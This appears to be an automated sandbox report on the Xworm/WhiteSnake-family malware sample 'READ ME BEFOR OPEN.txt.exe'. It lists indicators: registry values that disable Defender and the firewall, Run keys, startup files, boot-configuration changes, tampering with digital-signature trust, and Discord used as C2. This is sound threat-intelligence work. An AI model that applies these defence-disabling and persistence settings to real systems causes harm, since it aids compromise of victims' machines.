Analysis Overview
SHA256
159c1154b8553b15f7feebbb129b1a69ce1f24dea85e2837ad84160e1ce6dc5c
Threat Level: Known bad
The file READ ME BEFOR OPEN.txt.exe was found to be: Known bad.
Malicious Activity Summary
Detect Xworm Payload
Xworm family
Gurcu family
Disables service(s)
Modifies Windows Defender DisableAntiSpyware settings
Modifies security service
Gurcu, WhiteSnake
Contains code to disable Windows Defender
Xworm
Modifies boot configuration data using bcdedit
Disables RegEdit via registry modification
Stops running service(s)
Sets file to hidden
Drops file in Drivers directory
Boot or Logon Autostart Execution: Active Setup
Modifies Windows Firewall
Command and Scripting Interpreter: PowerShell
Blocklisted process makes network request
Manipulates Digital Signatures
Disables Task Manager via registry modification
Possible privilege escalation attempt
Executes dropped EXE
Drops startup file
Modifies file permissions
Looks up external IP address via web service
Legitimate hosting services abused for malware hosting/C2
Enumerates connected drives
Power Settings
Adds Run key to start application
Network Share Discovery
File and Directory Permissions Modification: Windows File and Directory Permissions Modification
Sets desktop wallpaper using registry
Drops file in System32 directory
Launches sc.exe
Drops file in Windows directory
Browser Information Discovery
Event Triggered Execution: Netsh Helper DLL
Enumerates physical storage devices
Unsigned PE
Suspicious use of SendNotifyMessage
Uses Task Scheduler COM API
Suspicious use of WriteProcessMemory
Runs net.exe
Scheduled Task/Job: Scheduled Task
Suspicious use of AdjustPrivilegeToken
Uses Volume Shadow Copy WMI provider
Uses Volume Shadow Copy service COM API
Suspicious behavior: EnumeratesProcesses
Checks processor information in registry
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Enumerates system info in registry
Suspicious use of SetWindowsHookEx
Checks SCSI registry key(s)
Views/modifies file attributes
Modifies registry class
Kills process with taskkill
Modifies data under HKEY_USERS
Suspicious use of FindShellTrayWindow
Delays execution with timeout.exe
Suspicious behavior: GetForegroundWindowSpam
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported
2025-03-20 18:47
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2025-03-20 18:47
Reported
2025-03-20 19:05
Platform
win11-20250313-en
Max time kernel
898s
Max time network
903s
Command Line
Signatures
Contains code to disable Windows Defender
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Disables service(s)
Gurcu family
Gurcu, WhiteSnake
Modifies Windows Defender DisableAntiSpyware settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" | C:\Windows\system32\reg.exe | N/A |
Modifies security service
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\mpssvc\Start = "4" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\mpssvc\Start = "4" | C:\Windows\system32\reg.exe | N/A |
Xworm
Xworm family
Modifies boot configuration data using bcdedit
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | N/A | N/A |
Boot or Logon Autostart Execution: Active Setup
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-994669834-3080981395-1291080877-1000\Software\Microsoft\Active Setup\Installed Components | N/A | N/A |
Command and Scripting Interpreter: PowerShell
Disables RegEdit via registry modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-21-994669834-3080981395-1291080877-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" | C:\Windows\system32\reg.exe | N/A |
Disables Task Manager via registry modification
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Windows\system32\cmd.exe | N/A |
Manipulates Digital Signatures
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-994669834-3080981395-1291080877-1000\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Software\Rasauq on top\ | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Software\Rasauq on top\ | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top\ | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-994669834-3080981395-1291080877-1000\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top\ | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top\ | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top\ | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-994669834-3080981395-1291080877-1000\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top\ | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top\ | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top\ | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top\ | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top\ | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Software\Rasauq on top\ | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Software\Rasauq on top\ | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top\ | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Software\Rasauq on top\ | C:\Windows\system32\reg.exe | N/A |
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
Possible privilege escalation attempt
Sets file to hidden
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\System32\attrib.exe | N/A |
Stops running service(s)
Drops startup file
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Host Service.lnk | C:\Users\Admin\AppData\Local\Temp\Rasauq SoftWorks.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Host Service.lnk | N/A | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Host Service.lnk | N/A | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ModMenu.bat | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ModMenu.bat | C:\Windows\system32\cmd.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hig.bat | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hig.bat | C:\Windows\system32\cmd.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Host Service.lnk | C:\Users\Admin\AppData\Local\Temp\Rasauq SoftWorks.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Rasauq SoftWorks.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\sRasauq SoftWorks.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Realtek Audio Driver Host\$77RealtekAudioDriverHost.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Windows Host Service.scr | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Modifies file permissions
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-994669834-3080981395-1291080877-1000\Software\Microsoft\Windows\CurrentVersion\Run\RasauqRemover = "\"\"" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-994669834-3080981395-1291080877-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Service | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-994669834-3080981395-1291080877-1000\Software\Microsoft\Windows\CurrentVersion\Run\RasauqRemover = "\"\"" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-994669834-3080981395-1291080877-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Host Service = "C:\\Users\\Admin\\AppData\\Local\\Windows Host Service.scr" | N/A | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-994669834-3080981395-1291080877-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Host Service = "C:\\Users\\Admin\\AppData\\Local\\Windows Host Service.scr" | C:\Users\Admin\AppData\Local\Temp\Rasauq SoftWorks.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-994669834-3080981395-1291080877-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Service | C:\Windows\system32\reg.exe | N/A |
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\D: | N/A | N/A |
| File opened (read-only) | \??\F: | N/A | N/A |
File and Directory Permissions Modification: Windows File and Directory Permissions Modification
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api64.ipify.org | N/A | N/A |
| N/A | api64.ipify.org | N/A | N/A |
| N/A | api64.ipify.org | N/A | N/A |
Network Share Discovery
Power Settings
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\System32\Rasauq\$77RasauqBroker.bat | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\Rasauq\$77RasauqBroker.bat | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\Rasauq\$77RasauqBroker.bat | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\system32\Recovery\ReAgent.xml | C:\Windows\system32\ReAgentc.exe | N/A |
| File opened for modification | C:\Windows\System32\$666-RasauqBroker.bat | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\system32\Recovery | C:\Windows\system32\ReAgentc.exe | N/A |
| File created | C:\Windows\System32\$666-RasauqBroker.bat | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\$666-RasauqBroker.bat | C:\Windows\system32\cmd.exe | N/A |
Sets desktop wallpaper using registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-994669834-3080981395-1291080877-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\IMG_3728.png" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-994669834-3080981395-1291080877-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\IMG_3728.png" | C:\Windows\system32\reg.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\Panther\UnattendGC\setuperr.log | C:\Windows\system32\ReAgentc.exe | N/A |
| File opened for modification | C:\Windows\Panther\UnattendGC\diagwrn.xml | C:\Windows\system32\ReAgentc.exe | N/A |
| File opened for modification | C:\Windows\Panther\UnattendGC\setuperr.log | C:\Windows\system32\ReAgentc.exe | N/A |
| File opened for modification | C:\Windows\Panther\UnattendGC\diagerr.xml | C:\Windows\system32\ReAgentc.exe | N/A |
| File opened for modification | C:\Windows\SystemTemp | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened for modification | C:\Windows\Logs\ReAgent\ReAgent.log | C:\Windows\system32\ReAgentc.exe | N/A |
| File opened for modification | C:\Windows\Panther\UnattendGC\diagerr.xml | C:\Windows\system32\ReAgentc.exe | N/A |
| File opened for modification | C:\Windows\Panther\UnattendGC\diagwrn.xml | C:\Windows\system32\ReAgentc.exe | N/A |
| File opened for modification | C:\Windows\Logs\ReAgent\ReAgent.log | C:\Windows\system32\ReAgentc.exe | N/A |
Launches sc.exe
Browser Information Discovery
Enumerates physical storage devices
Event Triggered Execution: Netsh Helper DLL
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\000E | C:\Windows\system32\powercfg.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\FriendlyName | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0003 | C:\Windows\system32\powercfg.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\HardwareID | C:\Windows\system32\powercfg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 | C:\Windows\system32\powercfg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0020 | C:\Windows\system32\powercfg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0002 | C:\Windows\system32\powercfg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0020 | C:\Windows\system32\powercfg.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\FriendlyName | C:\Windows\system32\powercfg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\000E | C:\Windows\system32\powercfg.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\HardwareID | C:\Windows\system32\powercfg.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName | C:\Windows\system32\powercfg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0020 | C:\Windows\system32\powercfg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0020 | C:\Windows\system32\powercfg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\000E | C:\Windows\system32\powercfg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0020 | C:\Windows\system32\powercfg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\000E | C:\Windows\system32\powercfg.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID | C:\Windows\system32\powercfg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\000E | C:\Windows\system32\powercfg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001 | C:\Windows\system32\powercfg.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0020 | C:\Windows\system32\powercfg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0002 | C:\Windows\system32\powercfg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0002 | C:\Windows\system32\powercfg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0100 | C:\Windows\system32\powercfg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0002 | C:\Windows\system32\powercfg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0100 | C:\Windows\system32\powercfg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\000E | C:\Windows\system32\powercfg.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\HardwareID | C:\Windows\system32\powercfg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\000E | C:\Windows\system32\powercfg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0002 | C:\Windows\system32\powercfg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0100 | C:\Windows\system32\powercfg.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName | C:\Windows\system32\powercfg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0003 | C:\Windows\system32\powercfg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0002 | C:\Windows\system32\powercfg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 | N/A | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\FriendlyName | C:\Windows\system32\powercfg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0002 | C:\Windows\system32\powercfg.exe | N/A |
